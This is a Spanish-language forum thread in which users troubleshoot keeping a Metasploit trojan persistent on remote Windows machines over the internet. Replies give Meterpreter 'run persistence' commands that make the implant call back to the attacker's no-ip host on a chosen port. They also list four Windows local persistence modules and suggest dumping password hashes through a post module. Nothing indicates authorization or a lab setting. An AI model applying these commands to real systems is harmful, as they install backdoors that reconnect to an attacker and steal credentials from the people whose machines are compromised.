metodos de persistencia metasploit

Iniciado por xeroAG, 18 Septiembre 2014, 19:38 PM

0 Miembros y 1 Visitante están viendo este tema.

xeroAG

hola ,tengo un problema a realizar persistencia en ataque wan

ejemplo yo configuro un troyano con mi direccion de no-ip hasta ahi todo me anda bien
lo segundo es establecer la conexion de handler ,estable perfecto.
se que no es el no-ip por que lo he usado cuando mi direccion cambia sin problemas

cuando tengo una sesion de meterpreter hago lo siguiente



run persistence -U -p 4444 -r midireccionde-no-ip.com  -i 10

pero si le doy quit al meterpreter y vuelvo a configurar la conexion de escucha si conecta estando activo el handler (no cerrando la terminal)
pero si cierro la terminal y de nuevo pongo msfconsole para arrancar metasploit y configuro la conexion de handler no conecta

pero en una red lan ssi me funciona cerrando la terminal.

no se cual se mi error tambien queria preguntar cuantos metodos de persistencia conocen para usar con metasploit.

silmido30

hola aka te dejo los que utilizo y yo. aunque ultimamente he utilizado el persistence de armitage y funciona muy bien. trata de realizar las pruebas desde armitage y nos cuentas.

1)  run persistence -A -U -X -i -r (direccion no-ip) -p (puerto)

2)  run persistence -A -L C:\\ -X -i 10 -p (puerto) -r (direccion no-ip)

saludos...

GreenArrow77

hola xeroag

por lo que he visto, haces la persistencia desde la meterpreter (y según mi experiencia de metasploit) algunos comandos en la meterpreter dan lugar a fallos, como por ejemplo, siendo "nt system" (es decir, que has elevado privilegios y anteriormente has hecho el "getsysem"), al escribir el comando "hashdump" me ha arrojado errores, y es ilógico porque esta todo correcto, y eso me llevó a considerar varias alternativas, y acabé mandando la sesión a segundo plano (con "background") y use desde msf el comando "use post/windows/gather/hashdump" y efectivamente funcionó, ahora bien...por que te explico todo esto? porque quiero que veas que hay veces que la meterpreter falla, y nos volvemos locos buscando los errores. Por tanto, dos posibles soluciones con un mismo factor en común, ya citado antes (usar los modulos desde la msf):

* use exploit/windows/local/persistence
* use exploit/windows/local/registry_persistence
* use exploit/windows/local/vss_persistence
* use exploit/windows/local/s4u_persistence

Estos 4 son bastante efectivos, a mi personalmente me gusta (y me funciona) el 2º, ya que el problema que creo que puedes tener es que cuando ejecutas desde la meterpreter el script "run persistence..." (porque es un script), y pienso que puede tender a fallar, pues pienso que puede suceder es que el payload que mandas a anclarse al registro (por eso se llama persistencia, porque se inicia con el registro, eso hay que tenerlo en cuenta) no se engancha correctamente o simplemente no lo hace. Por tanto, con esto creo que la persistencia tendría un buen resultado, ves probando otros metodos y comprobando que se ancla en el registro, espero haberte ayudado,

Posdata: esto es un copia y pega de un mensaje anterior dirigido (por mi) hacia otro compañero que tenía un problema similar, te dejo el link por si quieres consultarlo:

https://foro.elhacker.net/hacking_basico/no_funciona_la_persistencia_en_metasploit_framework-t454127.0.html

un saludo! -by secu
~La única lucha que se pierde es la que se abandona.- E."Che" Guevara~